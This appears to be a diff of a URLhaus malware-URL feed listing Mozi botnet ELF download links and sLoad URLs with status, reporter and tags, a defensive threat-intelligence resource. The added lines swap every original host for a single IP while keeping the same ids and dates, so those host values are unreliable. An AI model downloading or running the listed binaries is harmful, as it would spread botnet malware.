-{"id":"961506","urlhaus_reference":"https://urlhaus.abuse.ch/url/961506/","url":"http://115.63.202.43:51136/Mozi.m","url_status":"online","host":"115.63.202.43","date_added":"2021-01-14 20:52:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961504","urlhaus_reference":"https://urlhaus.abuse.ch/url/961504/","url":"http://59.99.40.204:45773/Mozi.m","url_status":"online","host":"59.99.40.204","date_added":"2021-01-14 20:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961505","urlhaus_reference":"https://urlhaus.abuse.ch/url/961505/","url":"http://117.247.128.213:56528/Mozi.m","url_status":"online","host":"117.247.128.213","date_added":"2021-01-14 20:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961500","urlhaus_reference":"https://urlhaus.abuse.ch/url/961500/","url":"http://14.137.219.132:44427/Mozi.a","url_status":"online","host":"14.137.219.132","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961501","urlhaus_reference":"https://urlhaus.abuse.ch/url/961501/","url":"http://42.224.40.14:36134/Mozi.m","url_status":"online","host":"42.224.40.14","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961502","urlhaus_reference":"https://urlhaus.abuse.ch/url/961502/","url":"http://186.33.104.107:43973/Mozi.m","url_status":"online","host":"186.33.104.107","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961503","urlhaus_reference":"https://urlhaus.abuse.ch/url/961503/","url":"http://85.105.16.154:41319/Mozi.m","url_status":"online","host":"85.105.16.154","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961496","urlhaus_reference":"https://urlhaus.abuse.ch/url/961496/","url":"http://178.141.73.115:51847/Mozi.a","url_status":"online","host":"178.141.73.115","date_added":"2021-01-14 20:52:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961497","urlhaus_reference":"https://urlhaus.abuse.ch/url/961497/","url":"http://186.33.104.135:54469/Mozi.m","url_status":"online","host":"186.33.104.135","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961498","urlhaus_reference":"https://urlhaus.abuse.ch/url/961498/","url":"http://115.56.159.43:34547/Mozi.m","url_status":"online","host":"115.56.159.43","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961499","urlhaus_reference":"https://urlhaus.abuse.ch/url/961499/","url":"http://42.230.138.170:33932/Mozi.m","url_status":"online","host":"42.230.138.170","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961548","urlhaus_reference":"https://urlhaus.abuse.ch/url/961548/","url":"http://89.160.20.156:34613/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:19:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961546","urlhaus_reference":"https://urlhaus.abuse.ch/url/961546/","url":"http://89.160.20.156:44941/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} 
+{"id":"961547","urlhaus_reference":"https://urlhaus.abuse.ch/url/961547/","url":"http://89.160.20.156:37173/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961545","urlhaus_reference":"https://urlhaus.abuse.ch/url/961545/","url":"http://89.160.20.156:47545/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961544","urlhaus_reference":"https://urlhaus.abuse.ch/url/961544/","url":"http://89.160.20.156:44782/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:07:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961543","urlhaus_reference":"https://urlhaus.abuse.ch/url/961543/","url":"http://89.160.20.156:44359/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961540","urlhaus_reference":"https://urlhaus.abuse.ch/url/961540/","url":"http://89.160.20.156:56507/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961541","urlhaus_reference":"https://urlhaus.abuse.ch/url/961541/","url":"http://89.160.20.156:57562/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:07:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961542","urlhaus_reference":"https://urlhaus.abuse.ch/url/961542/","url":"http://89.160.20.156:48845/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961539","urlhaus_reference":"https://urlhaus.abuse.ch/url/961539/","url":"http://89.160.20.156:58245/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961538","urlhaus_reference":"https://urlhaus.abuse.ch/url/961538/","url":"http://89.160.20.156:37198/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961537","urlhaus_reference":"https://urlhaus.abuse.ch/url/961537/","url":"http://89.160.20.156:33524/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961531","urlhaus_reference":"https://urlhaus.abuse.ch/url/961531/","url":"http://89.160.20.156:48261/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961532","urlhaus_reference":"https://urlhaus.abuse.ch/url/961532/","url":"http://89.160.20.156:34478/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961533","urlhaus_reference":"https://urlhaus.abuse.ch/url/961533/","url":"http://89.160.20.156:35703/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961534","urlhaus_reference":"https://urlhaus.abuse.ch/url/961534/","url":"http://89.160.20.156:48666/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961535","urlhaus_reference":"https://urlhaus.abuse.ch/url/961535/","url":"http://89.160.20.156:53923/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961536","urlhaus_reference":"https://urlhaus.abuse.ch/url/961536/","url":"http://89.160.20.156:52794/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961530","urlhaus_reference":"https://urlhaus.abuse.ch/url/961530/","url":"http://89.160.20.156:49312/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 21:05:34 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961525","urlhaus_reference":"https://urlhaus.abuse.ch/url/961525/","url":"http://89.160.20.156:38961/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961526","urlhaus_reference":"https://urlhaus.abuse.ch/url/961526/","url":"http://89.160.20.156:50420/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961527","urlhaus_reference":"https://urlhaus.abuse.ch/url/961527/","url":"http://89.160.20.156:55007/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961528","urlhaus_reference":"https://urlhaus.abuse.ch/url/961528/","url":"http://89.160.20.156:51143/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961529","urlhaus_reference":"https://urlhaus.abuse.ch/url/961529/","url":"http://89.160.20.156:41003/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961524","urlhaus_reference":"https://urlhaus.abuse.ch/url/961524/","url":"http://89.160.20.156:35739/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 21:04:38 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961523","urlhaus_reference":"https://urlhaus.abuse.ch/url/961523/","url":"http://89.160.20.156:45653/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 21:04:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961520","urlhaus_reference":"https://urlhaus.abuse.ch/url/961520/","url":"http://89.160.20.156:41349/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961521","urlhaus_reference":"https://urlhaus.abuse.ch/url/961521/","url":"http://89.160.20.156:48586/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961522","urlhaus_reference":"https://urlhaus.abuse.ch/url/961522/","url":"http://89.160.20.156:38111/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961518","urlhaus_reference":"https://urlhaus.abuse.ch/url/961518/","url":"http://89.160.20.156:34556/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:10 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961519","urlhaus_reference":"https://urlhaus.abuse.ch/url/961519/","url":"http://89.160.20.156:59815/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961516","urlhaus_reference":"https://urlhaus.abuse.ch/url/961516/","url":"http://89.160.20.156:50587/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961517","urlhaus_reference":"https://urlhaus.abuse.ch/url/961517/","url":"http://89.160.20.156:48322/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961515","urlhaus_reference":"https://urlhaus.abuse.ch/url/961515/","url":"http://89.160.20.156:33317/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961513","urlhaus_reference":"https://urlhaus.abuse.ch/url/961513/","url":"http://89.160.20.156:41516/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} 
+{"id":"961514","urlhaus_reference":"https://urlhaus.abuse.ch/url/961514/","url":"http://89.160.20.156:57798/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961509","urlhaus_reference":"https://urlhaus.abuse.ch/url/961509/","url":"http://89.160.20.156:47671/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961510","urlhaus_reference":"https://urlhaus.abuse.ch/url/961510/","url":"http://89.160.20.156:57690/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961511","urlhaus_reference":"https://urlhaus.abuse.ch/url/961511/","url":"http://89.160.20.156:50611/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961512","urlhaus_reference":"https://urlhaus.abuse.ch/url/961512/","url":"http://89.160.20.156:34141/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961507","urlhaus_reference":"https://urlhaus.abuse.ch/url/961507/","url":"http://89.160.20.156:44399/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:08 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961508","urlhaus_reference":"https://urlhaus.abuse.ch/url/961508/","url":"http://89.160.20.156:49120/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961506","urlhaus_reference":"https://urlhaus.abuse.ch/url/961506/","url":"http://89.160.20.156:51136/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961504","urlhaus_reference":"https://urlhaus.abuse.ch/url/961504/","url":"http://89.160.20.156:45773/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961505","urlhaus_reference":"https://urlhaus.abuse.ch/url/961505/","url":"http://89.160.20.156:56528/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961500","urlhaus_reference":"https://urlhaus.abuse.ch/url/961500/","url":"http://89.160.20.156:44427/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961501","urlhaus_reference":"https://urlhaus.abuse.ch/url/961501/","url":"http://89.160.20.156:36134/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961502","urlhaus_reference":"https://urlhaus.abuse.ch/url/961502/","url":"http://89.160.20.156:43973/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961503","urlhaus_reference":"https://urlhaus.abuse.ch/url/961503/","url":"http://89.160.20.156:41319/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961496","urlhaus_reference":"https://urlhaus.abuse.ch/url/961496/","url":"http://89.160.20.156:51847/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961497","urlhaus_reference":"https://urlhaus.abuse.ch/url/961497/","url":"http://89.160.20.156:54469/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961498","urlhaus_reference":"https://urlhaus.abuse.ch/url/961498/","url":"http://89.160.20.156:34547/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961499","urlhaus_reference":"https://urlhaus.abuse.ch/url/961499/","url":"http://89.160.20.156:33932/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} {"id":"961494","urlhaus_reference":"https://urlhaus.abuse.ch/url/961494/","url":"https://univirtek.com/viro/02478080035/blank.jpg","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:51:47 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} {"id":"961495","urlhaus_reference":"https://urlhaus.abuse.ch/url/961495/","url":"https://univirtek.com/viro/FRRNDR77C25D325O/map.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:51:47 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} {"id":"961492","urlhaus_reference":"https://urlhaus.abuse.ch/url/961492/","url":"https://ladiesincode.com/ladi/CNNSRG83H04F158R/blank.jpg","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:51:45 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} 
@@ -143,528 +143,528 @@ {"id":"961407","urlhaus_reference":"https://urlhaus.abuse.ch/url/961407/","url":"https://hoagtechhydroponics.com/teco/LGTCDC74T45F205G/logo.png","url_status":"offline","host":"hoagtechhydroponics.com","date_added":"2021-01-14 20:47:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} {"id":"961404","urlhaus_reference":"https://urlhaus.abuse.ch/url/961404/","url":"https://belfetproduction.com/bella/00160060349/uk.jpg","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:42:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} {"id":"961405","urlhaus_reference":"https://urlhaus.abuse.ch/url/961405/","url":"https://belfetproduction.com/bella/01288650243/1x1.jpg","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:42:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} -{"id":"961403","urlhaus_reference":"https://urlhaus.abuse.ch/url/961403/","url":"http://117.251.59.53:50611/bin.sh","url_status":"online","host":"117.251.59.53","date_added":"2021-01-14 20:39:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961402","urlhaus_reference":"https://urlhaus.abuse.ch/url/961402/","url":"http://60.243.120.169:45371/Mozi.a","url_status":"online","host":"60.243.120.169","date_added":"2021-01-14 20:36:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961400","urlhaus_reference":"https://urlhaus.abuse.ch/url/961400/","url":"http://61.54.50.155:50093/Mozi.m","url_status":"online","host":"61.54.50.155","date_added":"2021-01-14 20:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961401","urlhaus_reference":"https://urlhaus.abuse.ch/url/961401/","url":"http://59.95.175.109:36652/Mozi.m","url_status":"online","host":"59.95.175.109","date_added":"2021-01-14 20:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961397","urlhaus_reference":"https://urlhaus.abuse.ch/url/961397/","url":"http://42.235.65.235:54182/Mozi.m","url_status":"online","host":"42.235.65.235","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961398","urlhaus_reference":"https://urlhaus.abuse.ch/url/961398/","url":"http://222.137.177.178:46048/Mozi.m","url_status":"online","host":"222.137.177.178","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961399","urlhaus_reference":"https://urlhaus.abuse.ch/url/961399/","url":"http://222.137.232.114:33953/Mozi.m","url_status":"online","host":"222.137.232.114","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961393","urlhaus_reference":"https://urlhaus.abuse.ch/url/961393/","url":"http://182.117.10.46:36447/Mozi.a","url_status":"online","host":"182.117.10.46","date_added":"2021-01-14 20:35:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961394","urlhaus_reference":"https://urlhaus.abuse.ch/url/961394/","url":"http://171.38.193.49:36828/Mozi.m","url_status":"online","host":"171.38.193.49","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961395","urlhaus_reference":"https://urlhaus.abuse.ch/url/961395/","url":"http://202.111.130.185:55281/Mozi.m","url_status":"online","host":"202.111.130.185","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961396","urlhaus_reference":"https://urlhaus.abuse.ch/url/961396/","url":"http://119.102.83.85:49772/Mozi.m","url_status":"online","host":"119.102.83.85","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961391","urlhaus_reference":"https://urlhaus.abuse.ch/url/961391/","url":"http://117.222.165.246:50229/Mozi.m","url_status":"offline","host":"117.222.165.246","date_added":"2021-01-14 20:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961392","urlhaus_reference":"https://urlhaus.abuse.ch/url/961392/","url":"http://117.222.170.34:39996/Mozi.m","url_status":"online","host":"117.222.170.34","date_added":"2021-01-14 20:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
